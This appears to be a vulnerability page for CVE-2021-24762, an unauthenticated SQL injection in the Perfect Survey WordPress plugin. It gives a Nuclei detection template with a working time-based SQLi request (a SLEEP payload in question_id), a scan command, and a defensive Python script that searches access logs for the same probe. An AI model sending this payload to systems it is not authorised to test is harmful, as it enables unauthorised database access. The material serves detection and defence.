WordPress Perfect Survey <1.5.2 - SQL Injection
ID: CVE-2021-24762
Severity: critical
Author: cckuailong
Tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey
Description
Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
YAML Source
```yaml
id: CVE-2021-24762

info:
  name: WordPress Perfect Survey <1.5.2 - SQL Injection
  author: cckuailong
  severity: critical
  description: |
    Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
  remediation: |
    Update to the latest version of the WordPress Perfect Survey plugin (1.5.2) to mitigate the SQL Injection vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50766
    - https://github.com/cckuailong/reapoc/tree/main/2021/CVE-2021-24762/vultarget
    - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24762
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24762
    cwe-id: CWE-89
    epss-score: 0.33888
    epss-percentile: 0.96671
    cpe: cpe:2.3:a:getperfectsurvey:perfect_survey:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: getperfectsurvey
    product: perfect_survey
    framework: wordpress
  tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey

http:
  - raw:
      - |
        @timeout: 15s
        GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

      - type: word
        part: header
        words:
          - "wp-ps-session"

      - type: status
        status:
          - 404
# digest: 4a0a00473045022100bdf4261195c7abfaae51996938f98da499e218474d4090680a7808533670dd190220526da1ee7bd98d624310b11fb47ba711c637f20d02c68ee8ebf2cc18fc58c4f6:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is run with the Nuclei scanner against a target URL. It sends the single time-based request above (max-request: 1) and reports a match only when all three matchers hold: the response took at least 7 seconds (the injected SLEEP(7)), the response headers contain the plugin's wp-ps-session marker, and the status is 404.

```sh
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24762.yaml"
```
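The same condition viewed from the defender's side, as an added example that is not part of the template or of the plugin: a small Python check that scans web-server access-log lines (combined format) for get_question requests whose question_id is not a plain integer, which is exactly the shape of the probe above. The log lines are constructed sample data; the IPs and timestamps are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2022:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2022:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(7)))HQYx) HTTP/1.1" 404 0 "-" "curl/7.81.0"
198.51.100.9 - - [10/Mar/2022:10:00:12 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 35 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Time-based SQLi indicators inside the parameter value (SLEEP()/BENCHMARK()).
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)


def check_line(line):
    """Return a finding dict for a suspicious get_question request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(url.query)  # percent-decodes values for us
    if qs.get("action", [""])[0] != "get_question":
        return None
    qid = qs.get("question_id", [""])[0]
    # The plugin expects a numeric id; anything else is an injection attempt.
    if re.fullmatch(r"\d+", qid):
        return None
    return {
        "ip": m.group("ip"),
        "timestamp": m.group("ts"),
        "status": int(m.group("status")),
        "question_id": qid,
        "time_based": bool(TIME_BASED_RE.search(qid)),
    }


def scan_log(text):
    """Run check_line over every line and collect the findings."""
    return [f for f in (check_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit with time_based set and a slow response in the log's request-time field (if your log format records one) corroborates the template's duration>=7 matcher; the 404 status alone is not evidence, since the template requires all three conditions together.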